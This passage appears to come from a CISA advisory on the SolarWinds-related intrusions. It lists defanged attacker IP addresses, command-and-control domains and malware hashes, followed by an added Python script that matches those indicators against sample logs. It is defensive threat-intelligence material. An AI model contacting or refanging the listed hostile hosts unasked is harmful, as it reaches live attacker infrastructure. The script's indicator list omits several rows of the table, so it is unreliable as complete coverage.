href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]3</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]21</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]33</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]36</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]131</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]134</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]136</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]139</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]150</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]157</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.145[.]181</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;13.27.184[.]217</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;">&nbsp;<a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;18.217.225[.]111</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;">&nbsp;<a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;18.220.219[.]143</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;20.141.48[.]154</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;34.219.234[.]134</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.1[.]3</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.21[.]54</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.48[.]22</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.101[.]22</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.113[.]55</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.145[.]34</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.209[.]33</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.212[.]52</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.224[.]3</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.229[.]1</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.240[.]3</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;184.72.245[.]1</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;196.203.11[.]89</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;digitalcollege[.]org</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;freescanonline[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;globalnetworkissues[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;kubecloud[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;lcomputers[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;seobundlekit[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;solartrackingsystem[.]net</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;thedoccloud[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;virtualwebdata[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;">&nbsp;<a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;webcodez[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public">https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public">https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> </tbody> </table> <h3>References</h3> <ul> <li><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">[1] Volexity: Dark Halo Leverages SolarWinds Compromise to Breach Organizations</a></li> <li><a href="https://www.solarwinds.com/securityadvisory">[2] SolarWinds Security Advisory</a></li> <li><a 
href="https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html">[3] FireEye: Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor</a></li> <li><a href="https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SigninLogs/AzureAADPowerShellAnomaly.yaml">[4] GitHub: Azure / Azure-Sentinel - AzureAADPowerShellAnomaly.yaml</a></li> <li><a href="https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml">[5] GitHub: Azure / Azure-Sentinel - ADFSDomainTrustMods.yaml</a></li> </ul> <h3>Revisions</h3> <ul> <li>Initial Version: December 17, 2020</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>
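<p>The indicators in the table above are printed defanged (<code>[.]</code> in place of <code>.</code>), so they cannot be grepped for directly. The following Python is an added example and not part of the advisory: it refangs the table's own values and matches them against proxy, DNS and EDR log lines. The log lines are constructed for illustration, and two choices are made here rather than taken from the table: the <code>hxxp</code> refanging convention, and treating a hit on a listed domain as covering its subdomains.</p>

```python
"""Match the indicators printed in the table above against local log lines.

Added example, not part of the advisory: the indicator values are copied
from the table as printed (defanged with "[.]"), the log lines are
constructed for illustration, and the refanging and parent-domain rules
are choices made here.
"""
import ipaddress
import re

# (type, value) exactly as printed in the table above.
IOC_ROWS = [
    ("IPv4", "184.72.48[.]22"), ("IPv4", "184.72.101[.]22"),
    ("IPv4", "184.72.113[.]55"), ("IPv4", "184.72.145[.]34"),
    ("IPv4", "184.72.209[.]33"), ("IPv4", "184.72.212[.]52"),
    ("IPv4", "184.72.224[.]3"), ("IPv4", "184.72.229[.]1"),
    ("IPv4", "184.72.240[.]3"), ("IPv4", "184.72.245[.]1"),
    ("IPv4", "196.203.11[.]89"),
    ("domain", "digitalcollege[.]org"), ("domain", "freescanonline[.]com"),
    ("domain", "globalnetworkissues[.]com"), ("domain", "kubecloud[.]com"),
    ("domain", "lcomputers[.]com"), ("domain", "seobundlekit[.]com"),
    ("domain", "solartrackingsystem[.]net"), ("domain", "thedoccloud[.]com"),
    ("domain", "virtualwebdata[.]com"), ("domain", "webcodez[.]com"),
    ("hash", "d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600"),
    ("hash", "c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71"),
]


def refang(value: str) -> str:
    """Undo common defanging ("[.]"/"(.)" for ".", "hxxp" for "http") and normalise case."""
    return (value.strip().lower()
            .replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http"))


def load_iocs(rows):
    """Group refanged indicators by type; a mangled IPv4 value fails loudly instead of being skipped."""
    iocs = {"IPv4": set(), "domain": set(), "hash": set()}
    for kind, value in rows:
        iocs[kind].add(refang(value))
    for ip in iocs["IPv4"]:
        ipaddress.IPv4Address(ip)  # raises ValueError on a bad refang
    return iocs


# Token extractors with boundary guards so 184.72.48.221 does not read as 184.72.48.22.
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
HOST_RE = re.compile(r"(?<![\w.-])(?:[a-z0-9-]+\.)+[a-z]{2,}(?![\w.-])", re.I)
SHA256_RE = re.compile(r"(?<![0-9a-f])[0-9a-f]{64}(?![0-9a-f])", re.I)


def scan_line(line, iocs):
    """Return sorted (kind, indicator) pairs found in one log line."""
    hits = set()
    for ip in IPV4_RE.findall(line):
        if ip in iocs["IPv4"]:
            hits.add(("IPv4", ip))
    for host in HOST_RE.findall(line):
        labels = host.lower().split(".")
        # A listed domain also covers its subdomains: www.thedoccloud.com -> thedoccloud.com.
        for i in range(len(labels) - 1):
            parent = ".".join(labels[i:])
            if parent in iocs["domain"]:
                hits.add(("domain", parent))
                break
    for digest in SHA256_RE.findall(line):
        if digest.lower() in iocs["hash"]:
            hits.add(("hash", digest.lower()))
    return sorted(hits)


def scan_lines(lines, iocs):
    """Map 1-based line numbers to their hits, omitting lines with none."""
    result = {}
    for n, line in enumerate(lines, 1):
        hits = scan_line(line, iocs)
        if hits:
            result[n] = hits
    return result


SAMPLE_LOGS = [  # constructed for this example, not real telemetry
    "2020-12-15T03:12:44Z proxy user=jdoe dst=184.72.101.22:443 url=https://freescanonline.com/api/ status=200",
    "2020-12-15T03:13:01Z dns client=10.0.0.7 query=www.thedoccloud.com type=A",
    "2020-12-15T03:15:09Z edr host=ws17 file=C:\\Windows\\Temp\\x.dll sha256=C15ABAF51E78CA56C0376522D699C978217BF041A3BD3C71D09193EFA5717C71",
    "2020-12-15T03:16:22Z proxy user=jdoe dst=198.51.100.7:443 url=https://example.com/ status=200",
]

if __name__ == "__main__":
    for n, hits in scan_lines(SAMPLE_LOGS, load_iocs(IOC_ROWS)).items():
        print(n, hits)
```

<p>The lookbehind/lookahead guards matter in practice: without them a token such as <code>184.72.48.221</code> would be reported as a hit on <code>184.72.48[.]22</code>, and a 64-hex substring of a longer identifier would be taken for a SHA-256.</p>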
December 10, 2020

AA20-345A: Cyber Actors Target K-12 Distance Learning Education to Cause Disruptions and Steal Data

